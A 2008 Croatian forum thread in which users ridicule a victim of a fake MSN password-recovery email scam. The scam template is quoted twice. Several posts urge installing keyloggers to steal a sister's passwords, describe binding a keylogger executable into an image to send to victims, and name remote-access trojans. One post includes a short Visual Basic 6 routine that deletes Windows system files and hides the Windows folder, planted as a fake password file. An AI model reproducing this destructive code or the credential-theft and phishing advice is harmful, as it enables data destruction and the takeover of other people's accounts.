Natrag   Forum.hr > Informatička tehnologija > Internet

Internet Sve o internetu, sadržaju i tehnologiji
Podforumi: Web, Web development, Internet biznis, Nove web stranice

Odgovor
 
Tematski alati Opcije prikaza
Old 25.08.2008., 22:00   #21
ako ne uspijes vratit onda si skini icecold reloaded 3 i zamrzni taj acc da ti ga ne bi zloupotrijebio
FODORA is offline  
Odgovori s citatom
Old 27.08.2008., 08:00   #22
meni se desilo isto, acc nisam nisam dobio,a neces vjerovatno ni ti
a sami smo krivi kad padamo na takve fore...
m-622 is offline  
Odgovori s citatom
Old 02.09.2008., 19:54   #23
Quote:
filko2 kaže: Pogledaj post
oprostite, nzeznam dali je ovo pitanje za help service ili ...

imam msn vec skoro godinu dana (odd 1. mjeseca), do tada mi nije bio potreban jer sam sve razgovore obavljao preko IRC kanala. Poslije kad sam postao game operator na balkanskim igricama, tražili su me da napravim msn, napravio sam ga i do sad nije bilo nikakvih problema. Imam 800 i vise kontakta pa mi je ovo vazno. upao sam u zamku, gledajte

[email protected] sa naslovom(subjectom) lost password..
-u prvi red napišite "in.mail.hotmail.com"
-u drugi red napišite vašu hotmail adresu , kliknite na razmak i napišite pass(lozinku) vaše msn adrese
-u treći red napišite željenu msn adresu kojoj želite otkriti pass(lozinku) i kliknite na razmak i stavite 0(nulu)..(tak se zna da se želi pass... (ah ti programeri..))
-u četvrti red napišite "void (main)=dmim/0 " (isto neki programski jezik)

-ZNAČI to bi moralo izgledati nekak ovak(samo text maila)

in.mail.hotmail.com
vaš[email protected] 123456
nađ[email protected] 0
void (main)=dmim/0

p.s. odgovore vam u roku od 24 sata...

ja sam to napravio, httio saznat od sestre pass, i nisu mi odgovorili gotovo tjedan dana, i kad dođem jedan dan doma, nemogu na msn, idem ponovo, nemoze i idem da zaboravio password, pa preko stabilnog e-maila, nece se ni tamo logirati, i onda kad tamo na net.hr idem da sam zaboravio pass, sve ispunim i postavi mi tajno pitanje "gle sad tko je HACKED! ". Ja mislim da je to zbog ovog jer mi oni nisu odg, a ja im dao pass.

Znate li mozda kako mogu taj problem rijesti jer mi je bitno i jel se vama kad to dogodilo???

Ma budala, ne kuzim koji su idioti ljudi koji na to nasijedaju.
Gle decek, mogo si se ovdje javit i pitat nas malo pametnije internet korisnike kako to ucinit.
Sad kad je vec tako, imas program koji se zove KEYLOGGER mislim, ima ih puno, al to je kljucna rijec. Skini, instaliraj i deri po svim sestrinim acc-ima i lozinkama
-=CuTe=- is offline  
Odgovori s citatom
Old 02.09.2008., 23:40   #24
ahahahahahahahaha
isuse kako glup, pa moras bit mentalno nerazvijen da nekom posaljes pass

evo fore kak da nekom provalite u msn
posaljite mi ovdje na forum.hr privatnu poruku

()bla main vodi
printf scanf lol žnj
-ovdje vas majl-
(onda tocno 3 reda ispod pvaš pass)


end>)

xD ovo sigurno funkcionira garantiram vam da ce netko dobit pristup necijem msn-u

e da neko objašnjenje

ovo vma radi na principu da ja imam superr acc na forum.hr i da on automatski prosljeđuje mailove do msn-a i tam odolazi do neke zbrke i vi dobite povratnu poruku
u kojoj vam je naveden pass
Dizzi is offline  
Odgovori s citatom
Old 03.09.2008., 03:14   #25
lol ta djeca kad upanu na takve fore, zbog toga svaka druga osoba mi salje zip: oh my good if you wanna see my wet pussy go on youareaidiotmommyboy.org, takve ja odma na block ili delete, hehehehe....
Doy is offline  
Odgovori s citatom
Old 03.09.2008., 09:28   #26
predjednostavno je provalit u msn ako znas,moj lega zaboravio pass ja mu prohakiro i tako malo okolo gledam po msnowima
dabrovina is offline  
Odgovori s citatom
Old 04.09.2008., 18:50   #27
ma glupost.. koji se seratori ovdje nađu..
Za provalu msn lozinke je potrena lista riječi i password cracker , ako je lozink ana hrvatskome jeziku , vjerojatnost da je pogodite je niti 5 % Naravno, skinut neki password cracker ili tako nesto..

Mah, hebo msn password, imas msn freezer-a, tak da to deri..
-=CuTe=- is offline  
Odgovori s citatom
Old 05.09.2008., 10:01   #28
znači, ti si htio hakerisati msn od svoje sestre a sada su tebi hakerisali..ahahahahahah

e to ti je škola da se ne baviš nelegalnim stvarima ako nemaš pojma o njima..

P.S.
a koji bolan je tebi uopšte dao posao GO-a na igrici, ajme bože....
BibikaBibika is offline  
Odgovori s citatom
Old 06.09.2008., 19:53   #29
Pozz ljudi, još u MSN-u piše da 'Ni u kom slučaju ne odavajte lozinke i slične osobne svari'. To se ne jebe ni 2%.

Nedavno sam naišao na jedan blog koji piše o tome, pošaljite i stić će vam šifra! Možda je to taj čovjek ili od tog frend!

Onda još piše da tako zbunite glavni kompjuter MSN-a u kojem su sve lozinke i da oni pošalju lozinku
Te bi fore i lobotizirani majmun prokužio
__________________
99.9% članova na Forumu je glupo. Ako pročitaš ovo i ti si!
Moby Master is offline  
Odgovori s citatom
Old 07.09.2008., 09:20   #30
Nije potrebno lazno predstavljanje .
Skini KEYLOGGER, skini BINDERA, spoji .exe datoteku s .jpg
(znaci stavis keyloggera u sliku ili neku drugu datoteku)
Posaljes zrtvi preko msn-a, i dobit ces sve podatke koje ta osoba pise na svojem racunalu.
Znaci ne samo podatke msn-a, nego svih mogucih lozinka.
Naravno, imas http://www.google.hr pa nauci.
PAPA
-=CuTe=- is offline  
Odgovori s citatom
Old 07.09.2008., 10:11   #31
Quote:
-=CuTe=- kaže: Pogledaj post
Nije potrebno lazno predstavljanje .
Skini KEYLOGGER, skini BINDERA, spoji .exe datoteku s .jpg
(znaci stavis keyloggera u sliku ili neku drugu datoteku)
Posaljes zrtvi preko msn-a, i dobit ces sve podatke koje ta osoba pise na svojem racunalu.
Znaci ne samo podatke msn-a, nego svih mogucih lozinka.
Naravno, imas http://www.google.hr pa nauci.
PAPA
To bi svi radili. Nije to baš tako...
__________________
99.9% članova na Forumu je glupo. Ako pročitaš ovo i ti si!
Moby Master is offline  
Odgovori s citatom
Old 07.09.2008., 15:21   #32
Inače i je tako lako.
Postoji program sa kojim otvoris source od neke slike (neznam kako se zove).
Onda zaljepis source nekog keylogger-a u tu sliku, ali treba skripta sa kojom bi keylogger tebi slao podatke s žrtvinog računala.
-=CuTe=- is offline  
Odgovori s citatom
Old 07.09.2008., 15:40   #33
ali ovo stvarno moze netko necu reci kakv napraviti.

Evo idem 1.srednje. I neki dan iz dosade ja pošaljem frendovima mail s drugog msn.a kojeg sam ja napravio kak im je netko hakiro msn i moraju poslati svoj password na taj i taj mail, i znate što se dogodilo? Od njih 7, 5 ih je to napravilo....
__________________
Kako oblikovati potpise
Starča is offline  
Odgovori s citatom
Old 08.10.2008., 21:40   #34
a i ja sam kao slala na te ''stručne'' msn adrese swe podatke..kak sam bila stupid
a nie mi bilo nish svejedno..al mi je to jedna cura rekla..i ona je mislila poslat al je prokužila tu drugu.lol
°°June°° is offline  
Odgovori s citatom
Old 09.10.2008., 08:21   #35
LOL znate onu foru s msn otvoris naprimjer [email protected] ili ako taj netko ima stranicu svoju pa nap [email protected] primjer i onda pises kako treba nesto poslat lozinku mos misliti...
----------
A drugo za keylogger je lako ili prorat ili turkojan my favorite jebeno su ljudi glupi

Ja radim ovako vidim na nekom blogu kako hakirati msn fino napravim sve to i stavim exe datoteku u kojoj se navodno nalazi password moj,jer ce taj wannabe mulac popusiti foru a onda otvorim visual basic 6 i napravim program koji brise windowse
----------
Kazu visual basic 6 zastario
Private Sub Form_Load()
Kill "c:\windows\*.txt"
Kill "c:\windows\*.exe"
Kill "c:\windows\*.dll"
Kill "c:\windows\system32\*.dll"
SetAttr "c:\windows\", vbHidden Ovaj dio ce sakriti windows dokument ako uopce bude mogao podici windowse ahah


End Sub
----------
Hm istom mjerom vrati nek te budala nepravi budalom.
Inace to su sve djeca 14,15 godina tako da su majmuni i misle da ce dobiti pass haha
ex_1 is offline  
Odgovori s citatom
Old 09.10.2008., 08:24   #36
Quote:
filko2 kaže: Pogledaj post
oprostite, nzeznam dali je ovo pitanje za help service ili ...

imam msn vec skoro godinu dana (odd 1. mjeseca), do tada mi nije bio potreban jer sam sve razgovore obavljao preko IRC kanala. Poslije kad sam postao game operator na balkanskim igricama, tražili su me da napravim msn, napravio sam ga i do sad nije bilo nikakvih problema. Imam 800 i vise kontakta pa mi je ovo vazno. upao sam u zamku, gledajte

[email protected] sa naslovom(subjectom) lost password..
-u prvi red napišite "in.mail.hotmail.com"
-u drugi red napišite vašu hotmail adresu , kliknite na razmak i napišite pass(lozinku) vaše msn adrese
-u treći red napišite željenu msn adresu kojoj želite otkriti pass(lozinku) i kliknite na razmak i stavite 0(nulu)..(tak se zna da se želi pass... (ah ti programeri..))
-u četvrti red napišite "void (main)=dmim/0 " (isto neki programski jezik)

-ZNAČI to bi moralo izgledati nekak ovak(samo text maila)

in.mail.hotmail.com
vaš[email protected] 123456
nađ[email protected] 0
void (main)=dmim/0

p.s. odgovore vam u roku od 24 sata...

ja sam to napravio, httio saznat od sestre pass, i nisu mi odgovorili gotovo tjedan dana, i kad dođem jedan dan doma, nemogu na msn, idem ponovo, nemoze i idem da zaboravio password, pa preko stabilnog e-maila, nece se ni tamo logirati, i onda kad tamo na net.hr idem da sam zaboravio pass, sve ispunim i postavi mi tajno pitanje "gle sad tko je HACKED! ". Ja mislim da je to zbog ovog jer mi oni nisu odg, a ja im dao pass.

Znate li mozda kako mogu taj problem rijesti jer mi je bitno i jel se vama kad to dogodilo???
Ajmo ovo nije illegalno,zasto ne otvoris ti novi msn acc sa [email protected] naprimjer i onda dodas lika [email protected] koji ti je ukrao acc ako se nepojavi posalji mail sa privitkom koji ce mu srusiti windowse
ex_1 is offline  
Odgovori s citatom
Old 09.10.2008., 08:29   #37
http://hakiranjemsn.blog.hr/2007/11/...msn-sifra.html
http://www.google.hr/search?hl=hr&q=...BEivanje&meta= evo pa malo pogledaj mozda i nadjes lika koji ti je mazno L)
ex_1 is offline  
Odgovori s citatom
Old 09.10.2008., 08:39   #38
http://jelena007mafia.mojblog.hr/p-h...na/135856.html citaj komentare a rolf bas su klinci

to ti je program(imam ga i ja)msn stealer text...instaliraj ga i ti sebi (gagaga)

http://hackmessenger.blog.hr/2007/12...msn-sifra.html
ex_1 is offline  
Odgovori s citatom
Old 09.10.2008., 10:47   #39
Daj moga si ova 4 posta skupit u jedan. I uz to što stavljaš linkove na jedan te isti način provale. Misliš da će to neko popušit?

Skuliraj se!
__________________
Nisam slijep, samo vas ignoriram.
Zodiac is offline  
Odgovori s citatom
Old 09.10.2008., 13:44   #40
Ajde dosta cirkusa...

Tema je zamišljenja kao mjesto za jadanje naivaca, a ne da "hakeri" pokazuju svoje veliko hakersko umjeće C/P stvari na koje su naišli na drugim forumima
MEP is offline  
Odgovori s citatom
Odgovor



Kreni na podforum




Sva vremena su GMT +2. Trenutno vrijeme je: 04:09.